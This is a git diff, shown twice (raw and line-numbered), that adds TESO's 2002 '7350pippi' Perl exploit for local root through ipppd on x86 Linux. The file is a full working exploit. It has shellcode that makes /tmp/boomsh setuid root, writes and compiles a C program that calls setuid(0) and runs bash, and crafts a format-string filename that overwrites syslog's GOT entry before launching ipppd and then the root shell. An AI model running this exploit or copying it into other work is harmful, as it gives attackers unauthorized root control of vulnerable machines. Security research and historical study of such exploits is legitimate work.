1 files changed, 97 insertions, 0 deletions
diff --git a/exploits/7350pippi/7350pippi.pl b/exploits/7350pippi/7350pippi.pl
new file mode 100644
index 0000000..ec8f142
--- /dev/null
+++ b/exploits/7350pippi/7350pippi.pl
@@ -0,0 +1,97 @@
+#!/usr/bin/perl
+# 7350pippi - x86/Linux ipppd local root
+#
+# (C) COPYRIGHT TESO Security, 2002
+# All Rights Reserved
+#
+# May be used under the terms of the GPL.
+# ipppd local root exploit:
+# ... 
+#    /*
+#     * Check if there is a device by this name.
+#     */
+#    if (stat(cp, &statbuf) < 0) {
+#        if (errno == ENOENT)
+#            return 0;
+#        syslog(LOG_ERR, cp);
+#        return -1;
+#    }
+# ...
+# 
+# This exploit changes the address of syslog in ipppd's
+# GOT. Since it returns -1 as seen above, ipppd will invoke
+# syslog() a second time soon this time using the address
+# given by us. We redirect the GOT entry to a stacklocation
+# where the filename of the executed program is normally
+# located. Since we symlink() the shellcode to /usr/sbin/ipppd
+# the shellcode goes on the stack AT A FIXED ADDRESS! Thus
+# we avoid ugly offsets and guessing/bruteforce.
+# If porting this exploits to other systems, you
+# need to find syslogs() GOT entry yourself.
+#
+use Fcntl;
+# chown()+chmod() /tmp/boomsh
+$shellcode = "\x90"x100 .
+"\x31\xc0\xb0\x46\xbb\xff\xff\xff\xff\x31\xc9\xcd\x80\xeb".
+"\x2a\x90\x90\x90\x90\x5e\x89\xf3\xff\x03\xff\x43\x04\x31".
+"\xc0\x88\x43\x0b\x31\xc0\xb0\xb6\x31\xc9\x31\xd2\xcd\x80".
+"\x31\xc0\xb0\x0f\x66\xb9\xed\x0d\xcd\x80\x31\xc0\x40\xcd".
+"\x80\xe8\xd5\xff\xff\xff\x2e\x74\x6d\x70\x2e\x62\x6f\x6f".
+"\x6d\x73\x68\x2e";
+unlink("/tmp/$shellcode");
+symlink("/usr/sbin/ipppd", "/tmp/$shellcode") or die "$!";
+# my syslog GOT entry @ 0x806c90c
+sysopen(O, "/tmp/boomsh.c", O_RDWR|O_CREAT, 0600) or die "$!";
+print O<<_EOF_;
+#include <stdio.h>
+int main()
+{
+        char *a[] = {"/bin/bash", "--norc", "--noprofile", NULL};
+        setuid(0);
+        execve(*a, a, NULL);
+        return -1;
+}
+_EOF_
+close O;
+print "Compiling boomshell ...\n";
+system("cc /tmp/boomsh.c -o /tmp/boomsh");
+$dir = "/tmp/L";
+mkdir($dir);
+$ret = 0xbffffffb - length($shellcode)+20;
+printf("Filename is located @ %x\n", $ret);
+# maybe need to change to your GOT entry
+# of syslog(); see above
+$file = "XX" .  pack(c4, 0x0c, 0xc9, 0x06, 0x08) . "1234" . # GOT
+                pack(c4, 0x0d, 0xc9, 0x06, 0x08) . "1234" . # GOT+1
+                pack(c4, 0x0e, 0xc9, 0x06, 0x08) . "1234" . # GOT+2
+                pack(c4, 0x0f, 0xc9, 0x06, 0x08);           # GOT+3
+                
+$stackpop = "%p"x11;
+$file .= $stackpop;
+#$file .= "%14d%n%69d%n%40d%n%192d%n";
+# Should be fixed. If not, find the 4 values for
+# %d yourself using gdb. This worked for me.
+$file .= "%221d%n%158d%n%256d%n%192d%n";
+open(O, ">$dir/$file") or die "$!";
+close O;
+system("/tmp/$shellcode", "..$dir/$file/");
+exec("/tmp/boomsh");

diff --git a/exploits/7350pippi/7350pippi.pl b/exploits/7350pippi/7350pippi.pl new file mode 100644 index 0000000..ec8f142 --- /dev/null +++ b/exploits/7350pippi/7350pippi.pl
@@ -0,0 +1,97 @@
	1	#!/usr/bin/perl
	2
	3	# 7350pippi - x86/Linux ipppd local root
	4	#
	5	# (C) COPYRIGHT TESO Security, 2002
	6	# All Rights Reserved
	7	#
	8	# May be used under the terms of the GPL.
	9
	10	# ipppd local root exploit:
	11	# ...
	12	# /*
	13	# * Check if there is a device by this name.
	14	# */
	15	# if (stat(cp, &statbuf) < 0) {
	16	# if (errno == ENOENT)
	17	# return 0;
	18	# syslog(LOG_ERR, cp);
	19	# return -1;
	20	# }
	21	# ...
	22	#
	23	# This exploit changes the address of syslog in ipppd's
	24	# GOT. Since it returns -1 as seen above, ipppd will invoke
	25	# syslog() a second time soon this time using the address
	26	# given by us. We redirect the GOT entry to a stacklocation
	27	# where the filename of the executed program is normally
	28	# located. Since we symlink() the shellcode to /usr/sbin/ipppd
	29	# the shellcode goes on the stack AT A FIXED ADDRESS! Thus
	30	# we avoid ugly offsets and guessing/bruteforce.
	31	# If porting this exploits to other systems, you
	32	# need to find syslogs() GOT entry yourself.
	33	#
	34
	35	use Fcntl;
	36
	37	# chown()+chmod() /tmp/boomsh
	38	$shellcode = "\x90"x100 .
	39	"\x31\xc0\xb0\x46\xbb\xff\xff\xff\xff\x31\xc9\xcd\x80\xeb".
	40	"\x2a\x90\x90\x90\x90\x5e\x89\xf3\xff\x03\xff\x43\x04\x31".
	41	"\xc0\x88\x43\x0b\x31\xc0\xb0\xb6\x31\xc9\x31\xd2\xcd\x80".
	42	"\x31\xc0\xb0\x0f\x66\xb9\xed\x0d\xcd\x80\x31\xc0\x40\xcd".
	43	"\x80\xe8\xd5\xff\xff\xff\x2e\x74\x6d\x70\x2e\x62\x6f\x6f".
	44	"\x6d\x73\x68\x2e";
	45
	46	unlink("/tmp/$shellcode");
	47	symlink("/usr/sbin/ipppd", "/tmp/$shellcode") or die "$!";
	48
	49	# my syslog GOT entry @ 0x806c90c
	50
	51	sysopen(O, "/tmp/boomsh.c", O_RDWR\|O_CREAT, 0600) or die "$!";
	52	print O<<_EOF_;
	53	#include <stdio.h>
	54	int main()
	55	{
	56	char *a[] = {"/bin/bash", "--norc", "--noprofile", NULL};
	57
	58	setuid(0);
	59	execve(*a, a, NULL);
	60	return -1;
	61	}
	62	_EOF_
	63	close O;
	64
	65	print "Compiling boomshell ...\n";
	66	system("cc /tmp/boomsh.c -o /tmp/boomsh");
	67
	68	$dir = "/tmp/L";
	69	mkdir($dir);
	70
	71	$ret = 0xbffffffb - length($shellcode)+20;
	72	printf("Filename is located @ %x\n", $ret);
	73
	74
	75	# maybe need to change to your GOT entry
	76	# of syslog(); see above
	77	$file = "XX" . pack(c4, 0x0c, 0xc9, 0x06, 0x08) . "1234" . # GOT
	78	pack(c4, 0x0d, 0xc9, 0x06, 0x08) . "1234" . # GOT+1
	79	pack(c4, 0x0e, 0xc9, 0x06, 0x08) . "1234" . # GOT+2
	80	pack(c4, 0x0f, 0xc9, 0x06, 0x08); # GOT+3
	81
	82	$stackpop = "%p"x11;
	83	$file .= $stackpop;
	84
	85	#$file .= "%14d%n%69d%n%40d%n%192d%n";
	86
	87	# Should be fixed. If not, find the 4 values for
	88	# %d yourself using gdb. This worked for me.
	89	$file .= "%221d%n%158d%n%256d%n%192d%n";
	90
	91	open(O, ">$dir/$file") or die "$!";
	92	close O;
	93
	94	system("/tmp/$shellcode", "..$dir/$file/");
	95
	96	exec("/tmp/boomsh");
	97